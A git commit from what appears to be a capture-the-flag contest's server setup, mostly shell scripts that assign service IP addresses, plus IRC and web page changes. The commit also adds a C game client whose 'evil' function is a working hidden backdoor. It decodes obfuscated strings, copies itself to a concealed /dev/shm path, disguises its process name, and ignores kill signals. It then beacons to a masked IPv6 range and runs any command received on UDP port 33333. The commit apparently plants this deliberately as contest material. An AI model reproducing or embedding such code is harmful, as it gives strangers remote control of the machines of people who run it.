reintegrate ipv4, tanks

This commit is contained in:
Neale Pickett 2012-04-19 17:40:30 -06:00
parent 3b425f85cf
commit 656ee81c2d
48 changed files with 520 additions and 1516 deletions

View File

@ -2,5 +2,7 @@
00admin-install:
$(call COPYTREE, packages/00admin/service, $(00ADMIN_PKGDIR)/service)
mkdir -p $(00ADMIN_PKGDIR)/sbin
cp packages/00admin/sbin/* $(00ADMIN_PKGDIR)/sbin
PACKAGES += 00admin

32
packages/00admin/sbin/fire-ip Executable file
View File

@ -0,0 +1,32 @@
#! /bin/sh -e
action=$1; shift
read n < ip.txt
if grep -q ipv4 /proc/cmdline; then
# IPv4
IP="10.0.0.$n/24"
else
# IPv6
l=$(busybox dc 16 o $n p)
IP="fd84:b410:3441::$l/64"
fi
[ "$action" ] && ip addr $action $IP dev eth0
if [ "$action" = "add" ]; then
fail=fail
for i in $(seq 5); do
if ip addr | grep -Fq $IP; then
fail=
break
fi
sleep 1
done
[ "$fail" ] && return 1
fi
[ "$action" = del ] || echo $IP

View File

@ -1,4 +1,3 @@
#! /bin/sh
read IP < ip.txt
ip addr del $IP dev eth0
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::ec6/64
198

View File

@ -1,7 +1,7 @@
#! /bin/sh -e
exec 2>&1
read IP < ip.txt
ip addr add $IP dev eth0 || true
IP=$(/opt/00admin/sbin/fire-ip add)
exec setuidgid nobody /opt/cowbull/bin/cowd < /opt/cowbull/tokens.txt

View File

@ -0,0 +1,355 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <signal.h>
#include <sysexits.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netdb.h>
#include <fcntl.h>
#define NODEBUG
#ifdef DEBUG
# define PORT 4444
#else
# define PORT 44
#endif
#define BDPORT 33333
#define BCNPORT_S 48172
#define BCNPORT_D 48179
int
bind_port(int fd, const struct in6_addr *addr, uint16_t port)
{
struct sockaddr_in6 saddr = { 0 };
saddr.sin6_family = AF_INET6;
saddr.sin6_port = htons(port);
memcpy(&saddr.sin6_addr, addr, sizeof *addr);
return bind(fd, (struct sockaddr *) &saddr, sizeof saddr);
}
void
sigchld(int unused)
{
while (0 < waitpid(-1, NULL, WNOHANG));
}
void
unmask_str(unsigned char *str)
{
int i = strlen(str);
while (i-- > 0) {
str[i] &= 127;
}
}
int
copyprog(const char *from, const char *to)
{
int fd_to, fd_from;
char buf[4096];
ssize_t nread;
int saved_errno;
fd_from = open(from, O_RDONLY);
if (fd_from < 0)
return -1;
fd_to = open(to, O_WRONLY | O_CREAT | O_TRUNC, 0700);
if (fd_to < 0)
goto out_error;
while (nread = read(fd_from, buf, sizeof buf), nread > 0)
{
char *out_ptr = buf;
ssize_t nwritten;
do {
nwritten = write(fd_to, out_ptr, nread);
if (nwritten >= 0)
{
nread -= nwritten;
out_ptr += nwritten;
}
else if (errno != EINTR)
{
goto out_error;
}
} while (nread > 0);
}
if (nread == 0)
{
if (close(fd_to) < 0)
{
fd_to = -1;
goto out_error;
}
close(fd_from);
/* Success! */
return 0;
}
out_error:
saved_errno = errno;
close(fd_from);
if (fd_to >= 0)
close(fd_to);
errno = saved_errno;
return -1;
}
void
signal_evil(int sig)
{
if (fork()) {
exit(1);
}
}
void
evil(int argc, char *argv[])
{
int i;
int sock;
char procname[] = "\xdb\xe8\xe3\xe9\xb1\xdd";
char cptarget[] = "\xaf\xe4\xe5\xf6\xaf\xf3\xe8\xed\xaf\xae\xa0";
unmask_str(procname);
unmask_str(cptarget);
if (strcmp(argv[0], cptarget)) {
if (fork()) {
return;
}
/* copy ourselves */
if (copyprog(argv[0], cptarget) == 0) {
argv[0] = cptarget;
execv(cptarget, argv);
}
} else {
unlink(cptarget);
if (fork()) {
exit(0);
}
}
/* mask the process title and arguments */
while (argc--) {
int p = strlen(argv[argc]);
while (p--) {
argv[argc][p] = 0;
}
}
strcpy(argv[0], procname);
{
int r = open("/dev/null", O_RDONLY);
int w = open("/dev/null", O_WRONLY);
dup2(r, 0);
dup2(w, 1);
dup2(w, 2);
close(r);
close(w);
setsid();
chdir("/");
signal(SIGHUP, signal_evil);
signal(SIGTERM, signal_evil);
signal(SIGINT, signal_evil);
signal(SIGQUIT, signal_evil);
}
sock = socket(AF_INET6, SOCK_DGRAM, 0);
if (-1 == bind_port(sock, &in6addr_any, BDPORT)) {
exit(0);
}
struct timeval tv;
tv.tv_sec = 5;
tv.tv_usec = 0;
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&tv,sizeof(struct timeval));
while (1) {
/* beacon */
int sock_beacon;
sock_beacon = socket(AF_INET6, SOCK_DGRAM, 0);
if (-1 == bind_port(sock_beacon, &in6addr_any, BCNPORT_S)) {
//perror("Beacon bind");
;; /* return EX_IOERR; */
}
int subnet;
if (sock_beacon > 0) {
for (subnet = 0; subnet < 50; subnet++) {
char payload[] = "hi";
char addr6_f[] = "\xe6\xe4\xb8\xb4\xba\xe2\xb4\xb1\xb0\xba\xb3\xb4\xb4\xb1\xba\xa5\xf8\xba\xba\xb1\xb3\xb3\xb7";
unmask_str(addr6_f);
char addr6[64];
sprintf(addr6, addr6_f, subnet);
//printf("%s\n", addr6);
struct addrinfo *beacon_addr;
{
struct addrinfo hints = { 0 };
hints.ai_family = PF_INET6;
hints.ai_socktype = SOCK_DGRAM;
hints.ai_flags = AI_NUMERICHOST;
if (0 != getaddrinfo(addr6, "48179", &hints, &beacon_addr)) {
;;//perror("Resolving address");
}
}
struct sockaddr_in6 saddr = { 0 };
if(-1 == sendto(sock_beacon, &payload, sizeof payload, 0, beacon_addr->ai_addr, beacon_addr->ai_addrlen)) {
;;//perror("Beacon send");
} else {
;;//printf("sent!\n");
}
}
}
close(sock_beacon);
/* end beacon */
/* c&c */
char cmd[400];
ssize_t inlen;
inlen = recvfrom(sock, cmd, sizeof(cmd)-1, 0, NULL, NULL);
if (inlen < 1) {
continue;
}
cmd[inlen] = 0;
if (! fork()) {
system(cmd);
exit(0);
}
}
}
int
main(int argc, char *argv[])
{
long answer = 0;
int sock;
int i;
struct addrinfo *addr;
uint32_t token = 0;
FILE *in, *out;
srand(time(NULL));
signal(SIGCHLD, sigchld);
if (argc < 2) {
fprintf(stderr, "Usage: %s SERVER\n", argv[0]);
return EX_USAGE;
}
evil(argc, argv);
{
struct addrinfo hints = { 0 };
hints.ai_family = PF_INET6;
hints.ai_socktype = SOCK_DGRAM;
hints.ai_flags = AI_NUMERICHOST;
if (0 != getaddrinfo(argv[1], "3782", &hints, &addr)) {
perror("Resolving address");
return EX_IOERR;
}
}
/*
* Set up socket
*/
sock = socket(AF_INET6, SOCK_DGRAM, 0);
if (-1 == bind_port(sock, &in6addr_any, PORT)) {
perror("Binding UDP port 44");
return EX_IOERR;
}
if (argv[2]) {
/* fork and exec */
} else {
in = stdin;
out = stdout;
}
while (1) {
long guess;
struct {
uint32_t token;
uint16_t guess;
} g;
g.token = token;
if (token) {
char line[20];
if (NULL == fgets(line, sizeof line, in)) {
break;
}
g.guess = strtol(line, NULL, 16);
} else {
g.guess = 0;
}
/* Send the guess */
if (-1 == sendto(sock, &g, sizeof g, 0, addr->ai_addr, addr->ai_addrlen)) {
perror("Sending packet");
return EX_IOERR;
}
/* read the result */
{
char buf[80];
ssize_t len;
len = recvfrom(sock, buf, sizeof buf, 0, NULL, NULL);
switch (len) {
case -1:
perror("Reading packet");
return EX_IOERR;
case 1:
/* It's a score */
printf("%02x\n", buf[0]);
break;
case 4:
/* New game token */
printf("NEW GAME\n");
token = *((uint32_t *) buf);
break;
default:
/* You win: this is your CTF token */
buf[len] = 0;
printf("A WINNER IS YOU: %s\n", buf);
break;
}
}
}
return 0;
}

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::a0d/64
13

View File

@ -2,7 +2,6 @@
exec 2>&1
IP=$(cat ip.txt)
ip addr add $IP dev eth0 || true
IP=$(/opt/00admin/sbin/fire-ip add)
exec tcpsvd -u nobody ${IP%/*} 1013 ./go

View File

@ -1,6 +1,6 @@
IRCD_PKGDIR = $(TARGET)/ircd
IRCD_BUILDDIR = $(BUILD)/ircd
IRCD_VERSION = 18
IRCD_VERSION = 19.1
IRCD_TAR = $(CACHE)/ngircd-$(IRCD_VERSION).tar.gz
IRCD_URL = ftp://ftp.berlios.de/pub/ngircd/ngircd-$(IRCD_VERSION).tar.gz
IRCD_SRCDIR = $(IRCD_BUILDDIR)/ngircd-$(IRCD_VERSION)

View File

@ -1,4 +1,3 @@
#! /bin/sh
IP=$(cat ip.txt)
ip addr del $IP dev eth0
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::6/64
6

View File

@ -1,15 +0,0 @@
[Global]
Name = irc.ctf
Info = CTF IRC
AdminInfo1 = CTF IRC Server
AdminInfo2 = The table at the front of the room
AdminEmail = zephyr@dirtbags.net
MotdPhrase = "welcome datacomp"
Listen = fd84:b410:3441::6
OperCanUseMode = yes
NoDNS = yes
NoIdent = yes
[Operator]
Name = oper
Password = operpass

View File

@ -2,11 +2,33 @@
exec 2>&1
IP=$(cat ip.txt)
ip addr add $IP label eth0:ircd dev eth0
ip monitor | grep -q $IP
IP=$(/opt/00admin/sbin/fire-ip add)
adduser -S -H -u 65534 nobody
adduser -S -H irc
operpass=$(dd if=/dev/urandom count=1 | md5sum | cut -d' ' -f1)
cat <<EOD >ngircd.conf
[Global]
Name = irc.ctf
Info = CTF IRC
AdminInfo1 = CTF IRC Server
AdminInfo2 = The table at the front of the room
AdminEmail = zephyr@dirtbags.net
MotdPhrase = "welcome datacomp"
Listen = ${IP%/*}
ServerUID = 101
ServerGID = 65534
[Options]
OperCanUseMode = yes
DNS = no
Ident = no
[Operator]
Name = oper
Password = $operpass
EOD
exec setuidgid irc /opt/ircd/bin/ngircd --config ./ngircd.conf --nodaemon

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::2/64
2

View File

@ -2,11 +2,9 @@
exec 2>&1
hostname mcp
IP=$(/opt/00admin/sbin/fire-ip add)
# Bring up address
IP=$(cat ip.txt)
ip addr add $IP dev eth0 || true
hostname mcp
# Link in puzzles and web pages
install -d /var/www

View File

@ -0,0 +1,5 @@
#! /bin/sh
while sleep 5; do
echo -n . 1>&2
done

View File

@ -0,0 +1,3 @@
#! /bin/sh
exec ./logclean

View File

@ -18,12 +18,15 @@
<ul>
<li>Alex Brugh</li>
<li>Paul Ferrell</li>
<li>Jeremy Scott</li>
<li>Danny Quist</li>
<li>Adam Glasgall</li>
<li>Curtis Hash</li>
<li>Aaron McPhall</li>
<li>Patrick Avery</li>
<li>Erin Ochoa</li>
<li>William Phillips</li>
<li>Danny Quist</li>
<li>Should your name be here? Please remind me!</li>
</ul>
<p>Parts of this contest were inspired by:</p>

View File

@ -15,12 +15,16 @@
<li>
<a href="puzzles.html">Puzzles</a>
</li>
<li>
<a href="news.html">News</a>
</li>
<li>
<a href="scoring.html">About scoring</a>
</li>
<li>
<a href="irc://[fd84:b410:3441::6]/ctf"
title="IRC on fd84:b410:3441::6, channel #ctf">Contest chat</a>
(<a href"irc://10.0.0.6/ctf" title="IRC on 10.0.0.6, channel #ctf">IPv4</a>)
carries important announcements, and sometimes clues and
puzzles.
</li>
@ -46,8 +50,10 @@
No DoS attacks.
</li>
<li>
Contest servers lie within <samp>fd84:b410:3441::/112</samp>.
Do not attack machines outside <samp>fd84:b410:3441::/48</samp>.
Contest servers lie within <samp>fd84:b410:3441::/112</samp>
(or <samp>10.0.0.0/24</samp> for IPv4 contests).
Do not attack machines outside <samp>fd84:b410:3441::/48</samp>
(<samp>10.0.0.0/16</samp>).
Low ports (under 1024) do not run contest categories, don't
waste your time.
</li>

View File

@ -0,0 +1,18 @@
<!DOCTYPE html>
<html>
<head>
<title>News</title>
<link rel="stylesheet" href="ctf.css" type="text/css">
</head>
<body>
<h1>News</h1>
<ul>
<li>Contest is open</li>
</ul>
<p>
This page will be updated with any new announcements.
</p>
</body>
</html>

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::4e11/64
17

View File

@ -2,7 +2,6 @@
exec 2>&1
IP=$(cat ip.txt)
ip addr add $IP dev eth0 || true
IP=$(/opt/00admin/sbin/fire-ip add)
exec setuidgid ctf /opt/multicaster/bin/multicaster ff15::62c 1580 </opt/multicaster/tokens.txt

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -0,0 +1 @@
8

View File

@ -0,0 +1,3 @@
#! /bin/sh
exec svlogd -tt $PWD

View File

@ -1,5 +1,8 @@
#! /bin/sh -e
IP=$(cat ../octopus/ip.txt)
exec 2>&1
IP=$(/opt/00admin/sbin/fire-ip)
sv s octopus >/dev/null || exit 1
exec tcpsvd ${IP%/*} 8888 ./octopus-redirect

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::8888/64
8

View File

@ -2,7 +2,8 @@
exec 2>&1
IP=$(cat ip.txt)
ip addr add $IP dev eth0 || true
IP=$(/opt/00admin/sbin/fire-ip add)
grep -q ipv4 /proc/cmdline && IP=::ffff:$IP
exec /opt/octopus/bin/octopus ${IP%/*} < /opt/octopus/tokens.txt

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::529/64
41

View File

@ -2,7 +2,7 @@
exec 2>&1
IP=$(cat ip.txt)
IP=$(/opt/00admin/sbin/fire-ip add)
ip addr add $IP dev eth0 || true
exec tcpsvd -u nobody ${IP%/*} 1013 /opt/playfair/bin/playfair

View File

@ -1,4 +1,3 @@
#! /bin/sh
IP=$(cat ip.txt)
ip addr del $IP dev eth0
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::2329/64
152

View File

@ -2,9 +2,7 @@
exec 2>&1
IP=$(cat ip.txt)
ip addr add $IP dev eth0
ip monitor | grep -q $IP
IP=$(/opt/00admin/sbin/fire-ip add)
# So I say to him, "Alex, what's a good high port number for a CTF category?"
# And he says, "6"

View File

@ -0,0 +1,3 @@
#! /bin/sh
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::c3/64
195

View File

@ -2,8 +2,7 @@
exec 2>&1
IP=$(cat ip.txt)
ip addr add $IP dev eth0 || true
IP=$(/opt/00admin/sbin/fire-ip add)
exec tcpsvd -u nobody ${IP%/*} 1013 ./go

View File

@ -1,4 +1,3 @@
#! /bin/sh
read IP < ip.txt
ip addr del $IP dev eth0
/opt/00admin/sbin/fire-ip del

View File

@ -1 +1 @@
fd84:b410:3441::b33b/64
59

View File

@ -1,8 +1,8 @@
#! /bin/sh -e
exec 2>&1
read IP < ip.txt
ip addr add $IP label eth0:rlyeh dev eth0 || true
IP=$(/opt/00admin/sbin/fire-ip add)
dir=/var/lib/ctf/rlyeh
install -o nobody -d $dir

View File

@ -1,12 +1,14 @@
#! /bin/sh
#! /bin/sh -e
exec 2>&1
mkdir -p /var/www/tanks
ln -s /opt/tanks/html/* /var/www/tanks/
ln -sf summary.html /var/www/tanks/index.html
ln -s /opt/tanks/html/* /var/www/tanks/ || true
ln -s summary.html /var/www/tanks/index.html || true
install -o ctf -d /var/lib/ctf/tanks/players
mkdir -p /var/lib/ctf/tanks/players
chown ctf /var/lib/ctf/tanks
chown ctf /var/lib/ctf/tanks/players
PATH=/bin:/opt/ctfbase/bin:/opt/tanks/bin; export PATH
exec ./tanksd

View File

@ -41,7 +41,7 @@ EOF
}
while true; do
for dn in /var/lib/ctf/teams/names/*; do
find /var/lib/ctf/teams/names -type f | while read dn; do
hash=${dn##*/}
install -o ctf -d $p/$hash
done
@ -92,24 +92,19 @@ window.onload = go;
<div id="game_box"><canvas id="battlefield"></canvas></div>
<p><span id="fps">0</span> fps</p>
EOF
/opt/tanks/bin/rank.awk $rfn >>$fn
awk -f /opt/tanks/bin/rank.awk $rfn >>$fn
cat /opt/tanks/html/nav.html.inc >>$fn
cat <<EOF >>$fn
</body>
</html>
EOF
winner.awk $rfn | while read winner; do
awk -f /opt/tanks/bin/winner.awk $rfn | while read winner; do
hash=$(basename $winner)
echo "Round $next winner: $hash" >> $log
nwinners=$(wc -l $log)
# Read a token
k=$(sed -n ${nwinners}p /opt/tanks/tokens.txt)
# XXX: pull this out into another daemon
# XXX: this puts the token in /proc/self/cmdline
wget -q -s "http://10.0.0.2/claim.cgi?t=$hash&k=$k"
/opt/mcp/bin/pointscli $hash tanks 1
done
ln -sf $fn $w/current.html

View File

@ -21,8 +21,6 @@ tanks-install: tanks-build
cp $(TANKS_BUILDDIR)/rank.awk $(TANKS_PKGDIR)/bin
cp $(TANKS_BUILDDIR)/winner.awk $(TANKS_PKGDIR)/bin
cp packages/tanks/tokens.txt $(TANKS_PKGDIR)/
$(call COPYTREE, packages/tanks/html, $(TANKS_PKGDIR)/html)
cp packages/mcp/www/ctf.css $(TANKS_PKGDIR)/html/style.css
cp $(TANKS_BUILDDIR)/nav.html.inc $(TANKS_PKGDIR)/html

File diff suppressed because it is too large Load Diff